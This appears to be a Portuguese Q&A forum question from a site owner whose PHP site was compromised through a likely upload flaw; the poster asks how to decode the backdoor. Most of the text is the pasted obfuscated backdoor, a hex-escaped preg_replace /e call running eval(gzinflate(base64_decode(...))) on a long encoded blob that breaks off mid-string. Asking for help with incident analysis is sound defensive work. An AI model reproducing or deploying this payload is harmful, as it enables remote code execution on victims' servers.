# Como me proteger deste Backdoor PHP?

Tags: php, upload

A uns dias atrás um site que desenvolvi foi invadido por aqueles famosos backdoor php. O que fico pensando é onde encontra-se a causa raiz da invasão deste blackhat? Sei que devo controlar as permissões das minhas pastas conforme necessário e inserir os htaccess para proteção de determinados arquivos, porém onde o invasor encontrou a brecha para dar o upload deste script para executar este shell? O servidor que hospeda o site é um windows server infelizmente sem grandes controles de segurança em um datacenter aqui da região (RS). Porém prefiro acreditar em ser uma falha no painel administrativo do meu site, onde tenho opções de upload de imagens. Pois o script chamado "ws0oxp.php" começou por lá. Assim foram dados mais upload por este shell no diretório principal.

Como desifro este preg_replace para identificar o código php por trás disto?
Ainda estou investigando e o script permanece lá:

```
    <?php
preg_replace("\x2F\x2E\x2A\x2F\x65","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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